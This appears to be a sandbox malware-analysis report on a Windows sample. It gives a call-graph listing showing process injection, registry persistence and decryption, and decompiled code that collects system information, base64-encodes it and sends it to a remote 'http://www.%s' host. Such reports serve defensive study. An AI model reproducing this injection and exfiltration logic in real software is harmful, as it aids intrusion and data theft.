ec20b0 5347->5376 5351 ec6891 5350->5351 5352 ec73d0 5350->5352 5351->5236 5352->5351 5353 ec7419 wsprintfA 5352->5353 5354 ec744b RegOpenKeyExA 5353->5354 5355 ec7444 5353->5355 5354->5351 5356 ec746f GetLocalTime RegSetValueExA RegCloseKey 5354->5356 5355->5354 5356->5351 5357->5257 5359 ec2527 5358->5359 5360 ec2573 5358->5360 5359->5360 5361 ec2531 VirtualAlloc 5359->5361 5360->5233 5361->5360 5362 ec257a VirtualAllocEx 5361->5362 5363 ec259f VirtualAllocEx 5362->5363 5365 ec25d7 5362->5365 5364 ec25bf VirtualFree 5363->5364 5363->5365 5364->5360 5366 ec2653 WriteProcessMemory 5365->5366 5367 ec2687 VirtualFree CreateRemoteThread 5366->5367 5368 ec2672 VirtualFree 5366->5368 5367->5360 5368->5360 5370 eca3ed 5369->5370 5371 eca370 5369->5371 5370->5203 5371->5370 5372 eca39b RegOpenKeyExA 5371->5372 5372->5370 5373 eca3bf RegSetValueExA RegCloseKey 5372->5373 5373->5370 5375 ec996b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 5374->5375 5375->5345 5377 ec2080 5376->5377 5378 ec20c3 GetEnvironmentVariableA lstrcatA 5376->5378 5377->5239 5377->5258 5379 ec20f2 lstrcatA lstrcatA 5378->5379 5380 ec2115 5378->5380 5379->5380 5381 ec2138 VirtualAlloc 5380->5381 5381->5377 5382 ec219d CreateProcessA 5381->5382 5383 ec21ca VirtualFree 5382->5383 5384 ec21e2 VirtualAllocEx 5382->5384 5383->5377 5385 ec2213 VirtualAllocEx 5384->5385 5387 ec227d 5384->5387 5386 ec223c TerminateProcess CloseHandle CloseHandle VirtualFree 5385->5386 5385->5387 5386->5377 5388 ec237b WriteProcessMemory 5387->5388 5389 ec23a0 TerminateProcess CloseHandle CloseHandle VirtualFree 5388->5389 5390 ec23e1 VirtualFree GetThreadContext 5388->5390 5389->5377 5391 ec2444 WriteProcessMemory 5390->5391 5392 ec2414 TerminateProcess CloseHandle CloseHandle 5390->5392 5393 ec246a TerminateProcess CloseHandle CloseHandle 5391->5393 5394 ec2497 SetThreadContext 5391->5394 5392->5377 5393->5377 5395 ec24d9 TerminateProcess CloseHandle CloseHandle 5394->5395 5396 ec24c4 ResumeThread 5394->5396 5395->5377 5396->5377 5398 ec77c0 CoInitialize 5397->5398 5399 ec78c3 5397->5399 5400 ec78bd CoUninitialize 5398->5400 5401 ec77e8 5398->5401 5400->5399 5402 ec77fc GetExitCodeProcess 5401->5402 5403 ec7898 VirtualFree 5401->5403 5405 ec7818 5402->5405 5406 ec788f 5402->5406 5404 ec97c0 2 API calls 5403->5404 5407 ec78ba 5404->5407 5408 ec782e CloseHandle Sleep 5405->5408 5409 ec7821 Sleep 5405->5409 5406->5403 5407->5400 5410 ec2070 32 API calls 5408->5410 5409->5406 5412 ec7851 5410->5412 5411 ec7863 5411->5403 5412->5406 5412->5411 5413 ec2510 8 API calls 5412->5413 5414 ec788c 5413->5414 5414->5406 5550 ec6444 5551 ec644d 5550->5551 5552 ec647b 5551->5552 5553 ec64ba GetEnvironmentVariableA 5551->5553 5556 ec65f3 5551->5556 5554 ec64e1 5553->5554 5557 ec9730 QueryPerformanceCounter 5554->5557 5555 ec6bbd 5555->5552 5561 eca360 3 API calls 5555->5561 5556->5555 5558 ec7250 7 API calls 5556->5558 5559 ec64f2 GetTickCount GetTempFileNameA CreateFileA 5557->5559 5560 ec6638 5558->5560 5559->5556 5562 ec6552 WriteFile 5559->5562 5565 ec6654 VirtualAlloc 5560->5565 5566 ec6752 5560->5566 5561->5552 5563 ec65dd 5562->5563 5564 ec6588 5562->5564 5563->5556 5567 ec65e6 CloseHandle 5563->5567 5564->5563 5569 ec6593 CloseHandle 5564->5569 5565->5566 5570 ec667a 5565->5570 5568 ec69ba GetEnvironmentVariableA 5566->5568 5571 ec678e VirtualAlloc 5566->5571 5572 ec6858 5566->5572 5567->5556 5574 ec69e1 5568->5574 5573 ec6c60 4 API calls 5569->5573 5619 ec97a0 GetProcessHeap RtlAllocateHeap 5570->5619 5586 ec6856 5571->5586 5587 ec67c6 5571->5587 5575 ec2070 32 API calls 5572->5575 5576 ec65ab 5573->5576 5579 ec9730 QueryPerformanceCounter 5574->5579 5575->5586 5578 ec1e60 2 API calls 5576->5578 5583 ec65b7 5578->5583 5580 ec69f2 GetTickCount GetTempFileNameA CreateFileA 5579->5580 5580->5555 5584 ec6a4f 5580->5584 5581 ec6698 CreateThread CloseHandle 5581->5566 5582 ec69a6 5582->5568 5589 ec65d8 5583->5589 5590 ec65c9 5583->5590 5591 ec6b1e WriteFile 5584->5591 5592 ec6a7b VirtualAlloc 5584->5592 5585 ec6891 5594 ec698a 5585->5594 5620 ec97a0 GetProcessHeap RtlAllocateHeap 5585->5620 5586->5582 5586->5585 5593 ec73c0 5 API calls 5586->5593 5588 ec6842 VirtualFree 5587->5588 5595 ec2070 32 API calls 5587->5595 5588->5586 5597 ec6cf0 4 API calls 5589->5597 5596 ec74a0 30 API calls 5590->5596 5598 ec6b1c 5591->5598 5592->5598 5599 ec6aaf 5592->5599 5593->5585 5594->5582 5603 ec2510 8 API calls 5594->5603 5601 ec67f5 5595->5601 5602 ec65ce ExitProcess 5596->5602 5597->5563 5604 ec6bc9 CloseHandle 5598->5604 5607 ec6b59 CloseHandle 5598->5607 5611 ec6b08 VirtualFree 5599->5611 5612 ec6ad2 WriteFile 5599->5612 5601->5588 5606 ec6809 VirtualAlloc 5601->5606 5603->5582 5604->5555 5605 ec68aa 5608 ec68e9 VirtualAlloc 5605->5608 5610 ec68ca 5605->5610 5609 ec683f 5606->5609 5613 ec1e60 2 API calls 5607->5613 5608->5610 5609->5588 5610->5594 5614 ec693f CreateThread CloseHandle 5610->5614 5611->5598 5612->5611 5615 ec6b72 5613->5615 5614->5594 5621 ec77b0 49 API calls 5614->5621 5615->5555 5616 ec73c0 5 API calls 5615->5616 5617 ec6b9e 5615->5617 5616->5617 5617->5555 5618 ec2510 8 API calls 5617->5618 5618->5555 5619->5581 5620->5605 5807 ec6305 5810 ec630e 5807->5810 5808 ec633c 5809 ec640e 5809->5808 5811 ec64ba GetEnvironmentVariableA 5809->5811 5816 ec65f3 5809->5816 5810->5808 5810->5809 5813 ec63a4 VirtualAlloc 5810->5813 5814 ec6410 5810->5814 5812 ec64e1 5811->5812 5817 ec9730 QueryPerformanceCounter 5812->5817 5813->5809 5824 ec63cc 5813->5824 5815 ec1ee0 2 API calls 5814->5815 5815->5809 5818 ec7250 7 API calls 5816->5818 5882 ec6bbd 5816->5882 5819 ec64f2 GetTickCount GetTempFileNameA CreateFileA 5817->5819 5820 ec6638 5818->5820 5819->5816 5822 ec6552 WriteFile 5819->5822 5827 ec6654 VirtualAlloc 5820->5827 5828 ec6752 5820->5828 5821 eca360 3 API calls 5821->5808 5825 ec65dd 5822->5825 5826 ec6588 5822->5826 5823 ec63fd VirtualFree 5823->5809 5824->5823 5829 ec1ee0 2 API calls 5824->5829 5825->5816 5830 ec65e6 CloseHandle 5825->5830 5826->5825 5832 ec6593 CloseHandle 5826->5832 5827->5828 5833 ec667a 5827->5833 5831 ec69ba GetEnvironmentVariableA 5828->5831 5835 ec678e VirtualAlloc 5828->5835 5836 ec6858 5828->5836 5834 ec63f4 5829->5834 5830->5816 5838 ec69e1 5831->5838 5837 ec6c60 4 API calls 5832->5837 5884 ec97a0 GetProcessHeap RtlAllocateHeap 5833->5884 5834->5823 5850 ec6856 5835->5850 5851 ec67c6 5835->5851 5839 ec2070 32 API calls 5836->5839 5840 ec65ab 5837->5840 5843 ec9730 QueryPerformanceCounter 5838->5843 5839->5850 5842 ec1e60 2 API calls 5840->5842 5847 ec65b7 5842->5847 5844 ec69f2 GetTickCount GetTempFileNameA CreateFileA 5843->5844 5848 ec6a4f 5844->5848 5844->5882 5845 ec6698 CreateThread CloseHandle 5845->5828 5846 ec69a6 5846->5831 5853 ec65d8 5847->5853 5854 ec65c9 5847->5854 5855 ec6b1e WriteFile 5848->5855 5856 ec6a7b VirtualAlloc 5848->5856 5849 ec6891 5858 ec698a 5849->5858 5885 ec97a0 GetProcessHeap RtlAllocateHeap 5849->5885 5850->5846 5850->5849 5857 ec73c0 5 API calls 5850->5857 5852 ec6842 VirtualFree 5851->5852 5859 ec2070 32 API calls 5851->5859 5852->5850 5861 ec6cf0 4 API calls 5853->5861 5860 ec74a0 30 API calls 5854->5860 5862 ec6b1c 5855->5862 5856->5862 5863 ec6aaf 5856->5863 5857->5849 5858->5846 5867 ec2510 8 API calls 5858->5867 5865 ec67f5 5859->5865 5866 ec65ce ExitProcess 5860->5866 5861->5825 5868 ec6bc9 CloseHandle 5862->5868 5871 ec6b59 CloseHandle 5862->5871 5875 ec6b08 VirtualFree 5863->5875 5876 ec6ad2 WriteFile 5863->5876 5865->5852 5870 ec6809 VirtualAlloc 5865->5870 5867->5846 5868->5882 5869 ec68aa 5872 ec68e9 VirtualAlloc 5869->5872 5874 ec68ca 5869->5874 5873 ec683f 5870->5873 5877 ec1e60 2 API calls 5871->5877 5872->5874 5873->5852 5874->5858 5878 ec693f CreateThread CloseHandle 5874->5878 5875->5862 5876->5875 5879 ec6b72 5877->5879 5878->5858 5886 ec77b0 49 API calls 5878->5886 5880 ec6b9e 5879->5880 5881 ec73c0 5 API calls 5879->5881 5879->5882 5880->5882 5883 ec2510 8 API calls 5880->5883 5881->5880 5882->5808 5882->5821 5883->5882 5884->5845 5885->5869 5887 ec8e80 5888 ec8e99 lstrcpyA 5887->5888 5892 ec8f15 5887->5892 5894 ec7b70 5888->5894 5891 ec8f4c Sleep 5893 ec8ed4 5891->5893 5893->5891 5893->5892 5895 ec7b7b SetEvent 5894->5895 5895->5893 5896 ec4880 5897 ec488f 5896->5897 5898 ec4a9f CryptReleaseContext 5897->5898 5900 ec48be CryptCreateHash 5897->5900 5899 ec4aab 5898->5899 5901 ec48f9 CryptHashData 5900->5901 5902 ec4a90 5900->5902 5903 ec4919 CryptDeriveKey 5901->5903 5904 ec4a83 CryptDestroyHash 5901->5904 5902->5898 5903->5904 5905 ec494a CryptDecrypt CryptDestroyKey 5903->5905 5904->5902 5905->5904 5906 ec4995 CryptCreateHash 5905->5906 5906->5904 5907 ec49b7 CryptHashData 5906->5907 5908 ec49da CryptGetHashParam 5907->5908 5909 ec4a76 CryptDestroyHash 5907->5909 5908->5909 5910 ec4a11 CryptGetHashParam 5908->5910 5909->5904 5910->5909 5911 ec4a3e 5910->5911 5911->5909 5912 ec2900 5913 ec291a 5912->5913 5914 ec2ae5 5912->5914 5913->5914 5915 ec292e InternetOpenA 5913->5915 5915->5914 5916 ec294f InternetConnectA 5915->5916 5917 ec297f HttpOpenRequestA 5916->5917 5918 ec2adb InternetCloseHandle 5916->5918 5919 ec29b0 wsprintfA InternetQueryOptionA InternetSetOptionA lstrlenA HttpSendRequestA 5917->5919 5920 ec2ad1 InternetCloseHandle 5917->5920 5918->5914 5921 ec2aaf GetLastError 5919->5921 5922 ec2a35 5919->5922 5920->5918 5923 ec2ac7 InternetCloseHandle 5921->5923 5924 ec2a4a InternetReadFile 5922->5924 5925 ec2a82 5922->5925 5923->5920 5924->5922 5924->5925 5925->5923 5926 ec8f1e 5927 ec8f4c Sleep 5926->5927 5929 ec8ed4 5927->5929 5928 ec8f15 5929->5927 5929->5928 5622 ec65d6 5623 ec65dd 5622->5623 5624 ec65e6 CloseHandle 5623->5624 5625 ec65f3 5623->5625 5624->5625 5626 ec6bbd 5625->5626 5627 ec7250 7 API calls 5625->5627 5629 eca360 3 API calls 5626->5629 5630 ec6c13 5626->5630 5628 ec6638 5627->5628 5631 ec6654 VirtualAlloc 5628->5631 5632 ec6752 5628->5632 5629->5630 5631->5632 5634 ec667a 5631->5634 5633 ec69ba GetEnvironmentVariableA 5632->5633 5635 ec678e VirtualAlloc 5632->5635 5636 ec6858 5632->5636 5637 ec69e1 5633->5637 5674 ec97a0 GetProcessHeap RtlAllocateHeap 5634->5674 5644 ec6856 5635->5644 5645 ec67c6 5635->5645 5638 ec2070 32 API calls 5636->5638 5640 ec9730 QueryPerformanceCounter 5637->5640 5638->5644 5641 ec69f2 GetTickCount GetTempFileNameA CreateFileA 5640->5641 5641->5626 5643 ec6a4f 5641->5643 5642 ec6698 CreateThread CloseHandle 5642->5632 5647 ec6b1e WriteFile 5643->5647 5648 ec6a7b VirtualAlloc 5643->5648 5649 ec73c0 5 API calls 5644->5649 5651 ec6891 5644->5651 5655 ec69a6 5644->5655 5646 ec6842 VirtualFree 5645->5646 5652 ec2070 32 API calls 5645->5652 5646->5644 5653 ec6b1c 5647->5653 5648->5653 5654 ec6aaf 5648->5654 5649->5651 5650 ec698a 5650->5655 5658 ec2510 8 API calls 5650->5658 5651->5650 5675 ec97a0 GetProcessHeap RtlAllocateHeap 5651->5675 5657 ec67f5 5652->5657 5659 ec6bc9 CloseHandle 5653->5659 5662 ec6b59 CloseHandle 5653->5662 5666 ec6b08 VirtualFree 5654->5666 5667 ec6ad2 WriteFile 5654->5667 5655->5633 5657->5646 5661 ec6809 VirtualAlloc 5657->5661 5658->5655 5659->5626 5660 ec68aa 5663 ec68e9 VirtualAlloc 5660->5663 5665 ec68ca 5660->5665 5664 ec683f 5661->5664 5668 ec1e60 2 API calls 5662->5668 5663->5665 5664->5646 5665->5650 5669 ec693f CreateThread CloseHandle 5665->5669 5666->5653 5667->5666 5670 ec6b72 5668->5670 5669->5650 5676 ec77b0 49 API calls 5669->5676 5670->5626 5671 ec6b9e 5670->5671 5672 ec73c0 5 API calls 5670->5672 5671->5626 5673 ec2510 8 API calls 5671->5673 5672->5671 5673->5626 5674->5642 5675->5660 5930 ec4096 5931 ec409f 5930->5931 5932 ec42cd DeleteCriticalSection 5931->5932 5933 ec40ab EnterCriticalSection 5931->5933 5936 ec42d7 5932->5936 5934 ec40da 5933->5934 5935 ec40bb VirtualFree 5933->5935 5937 ec40e0 TerminateThread 5934->5937 5938 ec40f3 ResetEvent LeaveCriticalSection CreateThread 5934->5938 5935->5934 5937->5938 5951 ec97a0 GetProcessHeap RtlAllocateHeap 5938->5951 5952 ec4ac0 164 API calls 5938->5952 5940 ec4221 WaitForMultipleObjects WaitForSingleObject 5942 ec424f WaitForSingleObject 5940->5942 5943 ec424b 5940->5943 5941 ec413a 5941->5940 5948 ec41d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 5941->5948 5944 ec4267 TerminateThread 5942->5944 5945 ec4273 EnterCriticalSection 5942->5945 5943->5942 5944->5945 5946 ec42a2 LeaveCriticalSection 5945->5946 5947 ec4283 VirtualFree 5945->5947 5949 ec97c0 2 API calls 5946->5949 5947->5946 5948->5941 5953 ec4ba0 74 API calls 5948->5953 5950 ec42bb 5949->5950 5950->5932 5951->5941 5677 ec28d0 5678 ec28f1 5677->5678 5679 ec28e1 InternetCloseHandle 5677->5679 5679->5678 5680 ecf050 5681 ecf05d 5680->5681 5684 ecede0 5681->5684 5683 ecf06e 5687 ecef90 GetPEB 5684->5687 5686 ecee18 5686->5683 5687->5686 5688 ec3450 5689 ec3494 VirtualFree 5688->5689 5690 ec34a7 5689->5690 5954 ec2090 5955 ec20b0 32 API calls 5954->5955 5956 ec20a2 5955->5956 5957 eca090 socket 5958 eca0aa 5957->5958 5959 eca0b2 htons gethostbyname 5957->5959 5959->5958 5962 eca0db 5959->5962 5960 eca117 connect 5961 eca12a 5960->5961 5960->5962 5963 eca148 5961->5963 5964 eca13a closesocket 5961->5964 5962->5960 5962->5961 5963->5958 5965 eca14e setsockopt setsockopt 5963->5965 5964->5958 5965->5958 5966 ec2890 5967 ec2899 5966->5967 5968 ec28a0 InternetOpenA 5966->5968 5967->5968

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 ec4ba0-ec4bbc CoInitialize 1 ec56f0-ec56fc CoUninitialize 0->1 2 ec4bc2-ec4bff call ec7b70 SetEvent 0->2 2->1 6 ec4c05-ec4c0e 2->6 7 ec4c28-ec4c84 VirtualAlloc * 3 6->7 8 ec4c10-ec4c21 WaitForSingleObject 6->8 9 ec4c8a-ec4c8e 7->9 10 ec56eb 7->10 8->7 11 ec4c23 8->11 9->10 12 ec4c94-ec4c98 9->12 10->1 11->1 12->10 13 ec4c9e-ec4cbd 12->13 15 ec52a2-ec52b2 13->15 16 ec4cc3-ec4cd0 13->16 17 ec52b4-ec52be 15->17 18 ec5325-ec534e call ec8370 15->18 19 ec529d 16->19 20 ec4cd6-ec4ce3 16->20 17->18 21 ec52c0-ec52d1 17->21 35 ec56b8-ec56e5 VirtualFree * 3 18->35 36 ec5354-ec537f lstrlenA * 2 18->36 22 ec4d1c-ec4d29 20->22 23 ec4ce5-ec4d17 call ec6170 * 2 call ec60c0 20->23 21->18 27 ec52d3-ec52dd 21->27 25 ec4d2b-ec4d5d call ec6170 * 2 call ec60c0 22->25 26 ec4d62-ec4d6f 22->26 23->19 25->19 32 ec4da8-ec4db5 26->32 33 ec4d71-ec4da3 call ec6170 * 2 call ec60c0 26->33 27->18 31 ec52df-ec5322 call ec7b70 27->31 31->18 37 ec4e2c-ec4e39 32->37 38 ec4db7-ec4dd8 GetCurrentThreadId call ec6170 32->38 33->19 35->10 36->35 43 ec5385-ec53ca wsprintfA CryptBinaryToStringA 36->43 44 ec4e3b-ec4e6d call ec6170 * 2 call ec60c0 37->44 45 ec4e72-ec4e7f 37->45 64 ec4dfd-ec4e04 38->64 65 ec4dda-ec4dfb call ec6170 call ec60c0 38->65 43->35 51 ec53d0-ec544e MultiByteToWideChar call ec17d0 43->51 44->19 55 ec4ee1-ec4eee 45->55 56 ec4e81-ec4eb4 GetSystemMetrics * 2 call ec6170 45->56 70 ec569b-ec56a2 51->70 71 ec5454-ec545e 51->71 61 ec4f40-ec4f4d 55->61 62 ec4ef0-ec4f13 GlobalMemoryStatus call ec6170 55->62 80 ec4eb9-ec4edc call ec6170 call ec60c0 56->80 76 ec4f4f-ec4f81 call ec6170 * 2 call ec60c0 61->76 77 ec4f86-ec4f93 61->77 87 ec4f18-ec4f3b call ec6170 call ec60c0 62->87 78 ec4e06-ec4e24 call ec6170 call ec60c0 64->78 79 ec4e27 64->79 65->79 70->35 82 ec56a4-ec56b2 VirtualFree 70->82 85 ec5470-ec5477 71->85 86 ec5460-ec546a 71->86 76->19 83 ec4f95-ec4fcb call ec6170 * 2 call ec60c0 77->83 84 ec4fd0-ec4fdd 77->84 78->79 79->19 80->19 82->35 83->19 100 ec4fdf-ec502d lstrlenA call ec6170 * 2 call ec60c0 84->100 101 ec5032-ec503f 84->101 95 ec551f-ec5526 85->95 96 ec547d-ec54af VirtualFree 85->96 86->85 86->95 87->19 95->70 115 ec552c-ec5540 EnterCriticalSection 95->115 108 ec54c0-ec54c7 96->108 100->19 105 ec5096-ec50a3 101->105 106 ec5041-ec5091 lstrlenA call ec6170 * 2 call ec60c0 101->106 121 ec5104-ec5111 105->121 122 ec50a5-ec50ff lstrlenA call ec6170 * 2 call ec60c0 105->122 106->19 108->95 120 ec54c9-ec54f5 call ec17d0 108->120 126 ec558c-ec55c1 VirtualAlloc 115->126 127 ec5542-ec5573 VirtualAlloc call ec7b70 115->127 149 ec54fa-ec550d 120->149 130 ec5172-ec517f 121->130 131 ec5113-ec516d lstrlenA call ec6170 * 2 call ec60c0 121->131 122->19 133 ec568e-ec5695 LeaveCriticalSection 126->133 134 ec55c7-ec55d8 GetTickCount 126->134 141 ec5578-ec5587 127->141 147 ec51e0-ec51ed 130->147 148 ec5181-ec51db lstrlenA call ec6170 * 2 call ec60c0 130->148 131->19 133->70 144 ec561c-ec5659 call ec7b70 * 2 134->144 145 ec55da-ec561a call ec7b70 * 2 134->145 141->133 193 ec565c-ec568b VirtualFree 144->193 145->193 153 ec523f-ec524c 147->153 154 ec51ef-ec523d lstrlenA call ec6170 * 2 call ec60c0 147->154 148->19 161 ec550f-ec5519 149->161 162 ec551b 149->162 153->19 169 ec524e-ec529a call ec9b90 call ec6170 * 2 call ec60c0 153->169 154->19 161->162 172 ec551d 161->172 162->95 169->19 172->108 193->133
                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                    			E00EC4BA0(intOrPtr _a4) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                                                                    				long _v52;
                                                                                                                                                                                                                                                    				void* _v56;
                                                                                                                                                                                                                                                    				char* _v60;
                                                                                                                                                                                                                                                    				CHAR* _v64;
                                                                                                                                                                                                                                                    				intOrPtr* _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				int _v76;
                                                                                                                                                                                                                                                    				void* _v80;
                                                                                                                                                                                                                                                    				void* _v84;
                                                                                                                                                                                                                                                    				void* _v88;
                                                                                                                                                                                                                                                    				void* _v92;
                                                                                                                                                                                                                                                    				void* _v96;
                                                                                                                                                                                                                                                    				void* _v100;
                                                                                                                                                                                                                                                    				void* _v124;
                                                                                                                                                                                                                                                    				void* _v132;
                                                                                                                                                                                                                                                    				void* _v136;
                                                                                                                                                                                                                                                    				void* _v140;
                                                                                                                                                                                                                                                    				void* _v144;
                                                                                                                                                                                                                                                    				void* _v148;
                                                                                                                                                                                                                                                    				void* _v152;
                                                                                                                                                                                                                                                    				void* _v156;
                                                                                                                                                                                                                                                    				void* _v160;
                                                                                                                                                                                                                                                    				char _v420;
                                                                                                                                                                                                                                                    				CHAR* _v424;
                                                                                                                                                                                                                                                    				int _v428;
                                                                                                                                                                                                                                                    				void* _v432;
                                                                                                                                                                                                                                                    				long _v436;
                                                                                                                                                                                                                                                    				short _v948;
                                                                                                                                                                                                                                                    				void* _v952;
                                                                                                                                                                                                                                                    				void* _v956;
                                                                                                                                                                                                                                                    				void* _v960;
                                                                                                                                                                                                                                                    				void* _v964;
                                                                                                                                                                                                                                                    				long _v968;
                                                                                                                                                                                                                                                    				void* _t306;
                                                                                                                                                                                                                                                    				void* _t307;
                                                                                                                                                                                                                                                    				void* _t308;
                                                                                                                                                                                                                                                    				int _t312;
                                                                                                                                                                                                                                                    				int _t318;
                                                                                                                                                                                                                                                    				long _t328;
                                                                                                                                                                                                                                                    				void* _t333;
                                                                                                                                                                                                                                                    				void* _t351;
                                                                                                                                                                                                                                                    				long _t358;
                                                                                                                                                                                                                                                    				void* _t637;
                                                                                                                                                                                                                                                    				void* _t638;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                    				_v8 = _a4;
                                                                                                                                                                                                                                                    				if(_v8 == 0) {
                                                                                                                                                                                                                                                    					L83:
                                                                                                                                                                                                                                                    					__imp__CoUninitialize(); // executed
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					E00EC7B70( &_v36, _v8, 0x1c);
                                                                                                                                                                                                                                                    					_t638 = _t637 + 0xc;
                                                                                                                                                                                                                                                    					SetEvent( *(_v8 + 0x10));
                                                                                                                                                                                                                                                    					_v40 = 0xea60;
                                                                                                                                                                                                                                                    					_v44 = _v28;
                                                                                                                                                                                                                                                    					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
                                                                                                                                                                                                                                                    						_v64 = _v44 * 0x28 + _v36;
                                                                                                                                                                                                                                                    						_v52 = 0x100000;
                                                                                                                                                                                                                                                    						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    						_v48 = _t306;
                                                                                                                                                                                                                                                    						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    						_v56 = _t307;
                                                                                                                                                                                                                                                    						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    						_v60 = _t308;
                                                                                                                                                                                                                                                    						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
                                                                                                                                                                                                                                                    							L82:
                                                                                                                                                                                                                                                    							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v68 = _v48;
                                                                                                                                                                                                                                                    							_v80 = 0;
                                                                                                                                                                                                                                                    							while(_v80 < 0x100) {
                                                                                                                                                                                                                                                    								_v80 = _v80 + 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                    							if( *0xed18a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
                                                                                                                                                                                                                                                    								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                    								_v68 = _v68 + 4;
                                                                                                                                                                                                                                                    								E00EC7B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
                                                                                                                                                                                                                                                    								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                    								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                    							_t312 = E00EC8370(_v48, _v72, _v56, 0x100000); // executed
                                                                                                                                                                                                                                                    							_t638 = _t638 + 0x10;
                                                                                                                                                                                                                                                    							_v76 = _t312;
                                                                                                                                                                                                                                                    							if(_v76 <= 0) {
                                                                                                                                                                                                                                                    								L81:
                                                                                                                                                                                                                                                    								VirtualFree(_v48, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    								VirtualFree(_v56, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    								VirtualFree(_v60, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    								goto L82;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v424 = "http://www.%s";
                                                                                                                                                                                                                                                    								_t318 = lstrlenA(_v64);
                                                                                                                                                                                                                                                    								if(_t318 + lstrlenA(_v424) >= 0x100) {
                                                                                                                                                                                                                                                    									goto L81;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								wsprintfA( &_v420, _v424, _v64);
                                                                                                                                                                                                                                                    								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                    								_v428 = 0x100000;
                                                                                                                                                                                                                                                    								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
                                                                                                                                                                                                                                                    									goto L81;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v956 = 0;
                                                                                                                                                                                                                                                    								_v432 = 0;
                                                                                                                                                                                                                                                    								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
                                                                                                                                                                                                                                                    								_v952 = 0;
                                                                                                                                                                                                                                                    								_t328 = E00EC17D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                    								_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                    								_v436 = _t328;
                                                                                                                                                                                                                                                    								if(_v436 <= 0) {
                                                                                                                                                                                                                                                    									L79:
                                                                                                                                                                                                                                                    									if(_v956 != 0) {
                                                                                                                                                                                                                                                    										VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									goto L81;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(_v436 < 0x100 || _v952 >= 0x1f4) {
                                                                                                                                                                                                                                                    									if( *0xed18a4 != 1) {
                                                                                                                                                                                                                                                    										goto L70;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    									_v956 = 0;
                                                                                                                                                                                                                                                    									_v432 = 0;
                                                                                                                                                                                                                                                    									_v960 = 0;
                                                                                                                                                                                                                                                    									while(_v960 < 4) {
                                                                                                                                                                                                                                                    										_t358 = E00EC17D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                    										_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                    										_v436 = _t358;
                                                                                                                                                                                                                                                    										if(_v436 > 0x100 || _v952 < 0x1f4) {
                                                                                                                                                                                                                                                    											goto L70;
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											_v960 = _v960 + 1;
                                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									goto L70;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									L70:
                                                                                                                                                                                                                                                    									if(_v436 > 0) {
                                                                                                                                                                                                                                                    										EnterCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                    										if( *(_v12 + 4) != 0) {
                                                                                                                                                                                                                                                    											_v968 =  *(_v12 + 8) + _v436;
